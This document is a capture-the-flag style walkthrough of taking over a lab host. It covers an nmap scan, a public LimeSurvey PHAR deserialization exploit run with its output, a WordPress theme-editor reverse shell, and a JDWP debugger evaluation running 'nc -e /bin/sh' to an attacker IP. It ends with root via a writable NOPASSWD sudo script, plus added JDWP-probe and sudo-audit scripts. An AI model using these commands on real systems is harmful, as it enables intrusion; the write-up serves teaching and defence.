Let’s start by running a port scan on the host using nmap.
The output of the scan can be seen below:
```
nmap -v -sS -sV 10.10.40.50
Nmap scan report for 10.10.40.50
Host is up (0.088s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE  VERSION
21/tcp  open  ftp?
80/tcp  open  http     Apache httpd 2.4.18 ((Ubuntu))
443/tcp open  ssl/http Apache httpd 2.4.18 ((Ubuntu))
```
Port 21 (ftp)
Anonymous authentication is not enabled on this FTP service, so there is nothing to gain here without credentials.
Port 80 (http)
Port 80 hosts LimeSurvey, an online survey application.
Port 443 (https)
On HTTPS we find a WordPress site, with a note stating that the default /wp-login page has been hidden.
The LimeSurvey instance can be attacked with a public exploit from Exploit-DB (EDB-ID 46634, used below). The vulnerable versions are susceptible to a PHP object deserialization attack: an authenticated user uploads a PHAR archive disguised as an image, and when the TCPDF export code references that file through the phar:// stream wrapper, PHP deserializes the archive's metadata and the attacker's payload executes.
Supplying the default credentials (admin / password) and running the exploit gives us a shell as www-data:
```
python 46634.py http://10.10.40.50 admin password
[*] Logging in to LimeSurvey...
[*] Creating a new Survey...
[+] SurveyID: 231443
[*] Uploading a malicious PHAR...
[*] Sending the Payload...
[*] TCPDF Response: <strong>TCPDF ERROR: </strong>[Image] Unable to get the size of the image: phar://./upload/surveys/231443/files/malicious.jpg
[+] Pwned! :)
[+] Getting the shell...
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```
Basic manual enumeration from this shell turns up LimeSurvey's config.php, which contains credentials.
Back on the WordPress site, the Log In link in the Meta section redirects to the hidden login portal (?devtools). The credentials from config.php work there and log us in as Anny.
Gaining Access
From previous experience with WordPress, we know that an administrator can get a reverse shell through the theme editor: it lets us write arbitrary PHP into files that the web server will happily execute.
Navigate to Appearance -> Editor, select archive.php and replace its content with a PHP reverse shell.
Set the listener IP address and port in the payload, then press the Update file button.
Before requesting the modified file, start a listener on the local machine.
Then request http://10.10.40.50/wp-content/themes/{themename}/archive.php
and we gain a shell as www-data.
Lateral Movement
Basic manual enumeration of the system shows, among other services, a listener on port 18001. This is the JDWP debug port that Ghidra opens when it is launched in debug mode, and here it is bound to all interfaces rather than to localhost only.
Ghidra is a Java-based reverse engineering framework with a graphical user interface, designed to run on Windows, macOS and Linux.
An exposed JDWP port allows remote code execution: the protocol has no authentication, and any debugger that attaches can evaluate arbitrary Java expressions inside the target JVM. We proceed as in the PoC video: set a breakpoint in a class whose run() method executes regularly, and when the breakpoint is hit, evaluate an expression that spawns a reverse shell from within the Java process.
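Before attaching with jdb it is worth confirming that the port really speaks JDWP and identifying the JVM behind it. The following is an added example, not part of the original writeup or of Ghidra: it performs the JDWP handshake, sends a single VirtualMachine.Version command and parses the reply. It ships with a constructed in-process mock server (its VM name and version strings are made up) so the probe can be exercised offline; against a real target, pass the host and port as arguments. Note that no credentials are involved anywhere: JDWP has no authentication, so whoever can reach the socket gets the same access as the developer.

```python
import socket
import struct
import sys
import threading

HANDSHAKE = b"JDWP-Handshake"
CMDSET_VM, CMD_VERSION = 1, 1  # VirtualMachine command set, Version command


def _read_exact(sock, n):
    """Read exactly n bytes; JDWP frames are length-prefixed, so short reads must not be tolerated."""
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed the connection mid-frame")
        buf += chunk
    return buf


def _read_string(data, offset):
    """JDWP string: 4-byte big-endian length followed by UTF-8 bytes. Returns (text, next_offset)."""
    (length,) = struct.unpack_from(">I", data, offset)
    start = offset + 4
    return data[start:start + length].decode("utf-8"), start + length


def _jdwp_string(text):
    raw = text.encode("utf-8")
    return struct.pack(">I", len(raw)) + raw


def probe_jdwp(host, port, timeout=3.0):
    """Attach to a suspected JDWP port and return the VM identity from VirtualMachine.Version,
    or None if the service does not speak JDWP. Nothing is authenticated: JDWP has no credentials."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(HANDSHAKE)
        if _read_exact(sock, len(HANDSHAKE)) != HANDSHAKE:
            return None
        # Command packet header: length (incl. header), id, flags (0 = command), command set, command
        packet_id = 1
        sock.sendall(struct.pack(">IIBBB", 11, packet_id, 0, CMDSET_VM, CMD_VERSION))
        # Reply packet header: length, id, flags (0x80 = reply), 2-byte error code, then the data
        length, reply_id, flags, error = struct.unpack(">IIBH", _read_exact(sock, 11))
        if reply_id != packet_id or flags != 0x80 or error != 0:
            return None
        data = _read_exact(sock, length - 11)
        # Version reply layout: description, jdwpMajor, jdwpMinor, vmVersion, vmName
        description, off = _read_string(data, 0)
        jdwp_major, jdwp_minor = struct.unpack_from(">ii", data, off)
        vm_version, off = _read_string(data, off + 8)
        vm_name, _ = _read_string(data, off)
        return {
            "description": description,
            "jdwp_version": f"{jdwp_major}.{jdwp_minor}",
            "vm_version": vm_version,
            "vm_name": vm_name,
        }


def start_mock_jdwp_server(vm_name="Mock HotSpot VM", vm_version="1.8.0_mock"):
    """Constructed stand-in for a JVM started with -agentlib:jdwp, so the probe can run offline.
    It answers the handshake and one Version command, then closes. Returns the bound port."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)

    def serve():
        conn, _ = srv.accept()
        with conn:
            if _read_exact(conn, len(HANDSHAKE)) == HANDSHAKE:
                conn.sendall(HANDSHAKE)
                _, req_id, _, _, _ = struct.unpack(">IIBBB", _read_exact(conn, 11))
                body = (
                    _jdwp_string("Java Debug Wire Protocol (Reference Implementation) version 1.8")
                    + struct.pack(">ii", 1, 8)
                    + _jdwp_string(vm_version)
                    + _jdwp_string(vm_name)
                )
                conn.sendall(struct.pack(">IIBH", 11 + len(body), req_id, 0x80, 0) + body)
        srv.close()

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]


def probe_mock():
    """Run the probe against the mock server; used by the stand-alone demo below."""
    return probe_jdwp("127.0.0.1", start_mock_jdwp_server())


if __name__ == "__main__":
    if len(sys.argv) == 3:  # e.g. python3 jdwp_probe.py 127.0.0.1 18001
        print(probe_jdwp(sys.argv[1], int(sys.argv[2])))
    else:
        print(probe_mock())
```

A non-None result from a host you do not administer is already a finding: the same handshake is all jdb performs before the `print new java.lang.Runtime().exec(...)` evaluation shown below, and a JVM that answers it will accept that too.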
```
www-data@ubuntu:/$ jdb -attach 127.0.0.1:18001
Set uncaught java.lang.Throwable
Set deferred uncaught java.lang.Throwable
Initializing jdb ...
> classpath
base directory: /home/veronica
classpath: [/home/veronica/ghidra_9.0/support/../Ghidra/Framework/Utility/lib/Utility.jar]
> classes
. . .
> stop in org.apache.logging.log4j.core.util.WatchManager$WatchRunnable.run()
>
Breakpoint hit: "thread=Log4j2-TF-4-Scheduled-1", org.apache.logging.log4j.core.util.WatchManager$WatchRunnable.run(), line=96 bci=0
Log4j2-TF-4-Scheduled-1[1] print new java.lang.Runtime().exec("nc -e /bin/sh 10.9.140.180 8888")
```
In the output below we can see that a shell arrives as the user veronica, the account Ghidra was started under:
```
nc -lnvp 8888
listening on [any] 8888 ...
connect to [10.9.140.180] from (UNKNOWN) [10.10.98.112] 55378
id
uid=1000(veronica) gid=1000(veronica) groups=1000(veronica),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)
python -c 'import pty;pty.spawn("/bin/bash")'
veronica@ubuntu:~$ wc user.txt
1170 user.txt
```
Privilege Escalation
Issuing sudo -l shows which commands we may run as root, together with the Defaults that apply to us.
```
veronica@ubuntu:~$ sudo -l
Matching Defaults entries for veronica on ubuntu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User veronica may run the following commands on ubuntu:
    (ALL : ALL) ALL
    (root : root) NOPASSWD: /usr/bin/python3.5 /home/veronica/base.py
```
The first rule lets veronica run anything as anyone, but it prompts for her password. The second rule is the useful one: it lets us run /home/veronica/base.py as root with no password, and since the script lives in veronica's own home directory, we fully control its contents.
We delete the existing file and replace it with a Python script of the same name containing a one-liner that spawns a bash shell; running it through sudo then gives us a root shell.
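The pattern above, a NOPASSWD rule pointing at a script the invoking user can modify, is worth checking for systematically rather than by eye. The following added example (not from the original writeup) parses sudo -l output into rules and reports NOPASSWD commands whose absolute-path arguments, or the directories holding them, are writable by the current user. The embedded sample is the sudo -l output shown above, labelled as such; run directly, the script analyses the real output of `sudo -n -l` on the current host and falls back to the sample when sudo is unavailable or wants a password. The `is_writable` hook is there so the check can be exercised against a simulated filesystem.

```python
import os
import re
import subprocess
from collections import namedtuple

SudoRule = namedtuple("SudoRule", "runas_user runas_group nopasswd command")

# Constructed sample: the sudo -l output seen on the box (raw string so the
# escaped colons in secure_path survive verbatim).
SAMPLE_SUDO_L = r"""Matching Defaults entries for veronica on ubuntu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User veronica may run the following commands on ubuntu:
    (ALL : ALL) ALL
    (root : root) NOPASSWD: /usr/bin/python3.5 /home/veronica/base.py
"""

# One command entry: "(runas_user : runas_group) TAG: TAG: command args"
RULE_RE = re.compile(
    r"^\s*\((?P<user>[^:)]+?)\s*(?::\s*(?P<group>[^)]+?)\s*)?\)\s*"
    r"(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S.*?)\s*$"
)


def parse_sudo_l(text):
    """Turn the 'may run the following commands' section of sudo -l into SudoRule objects."""
    rules, in_commands = [], False
    for line in text.splitlines():
        if line.startswith("User ") and "may run the following commands" in line:
            in_commands = True
            continue
        if not in_commands or not line.strip():
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = [t for t in m.group("tags").replace(" ", "").split(":") if t]
        user = m.group("user").strip()
        group = (m.group("group") or "").strip()  # empty when sudo printed only "(user)"
        rules.append(SudoRule(user, group, "NOPASSWD" in tags, m.group("cmd")))
    return rules


def writable_targets(rules, is_writable=None):
    """Return (rule, path) pairs for NOPASSWD rules naming an absolute path we can modify:
    the file itself, or its parent directory (a writable directory lets us delete and
    recreate the file, which is exactly what the writeup does with base.py)."""
    if is_writable is None:
        is_writable = lambda path: os.access(path, os.W_OK)
    findings = []
    for rule in rules:
        if not rule.nopasswd or rule.command == "ALL":
            continue  # a bare "NOPASSWD: ALL" needs no writable file; it is root already
        for token in rule.command.split():
            if token.startswith("/") and (is_writable(token) or is_writable(os.path.dirname(token))):
                findings.append((rule, token))
    return findings


def report(text, is_writable=None):
    """Human-readable findings for a block of sudo -l output."""
    return [
        f"{path} is writable and runs as {rule.runas_user} without a password: {rule.command}"
        for rule, path in writable_targets(parse_sudo_l(text), is_writable)
    ]


if __name__ == "__main__":
    try:
        # -n: never prompt; a non-zero exit (password required, no sudo) falls back to the sample
        output = subprocess.run(["sudo", "-n", "-l"], capture_output=True, text=True, check=True).stdout
    except (OSError, subprocess.CalledProcessError):
        output = SAMPLE_SUDO_L
    for line in report(output) or ["no writable NOPASSWD targets found"]:
        print(line)
```

With base.py confirmed as a writable target, the finish is the one the writeup describes: overwrite it with `import os; os.execl("/bin/bash", "bash", "-p")` and run `sudo /usr/bin/python3.5 /home/veronica/base.py`. The defensive fix is the mirror image: sudo rules should only ever point at root-owned files in root-owned directories.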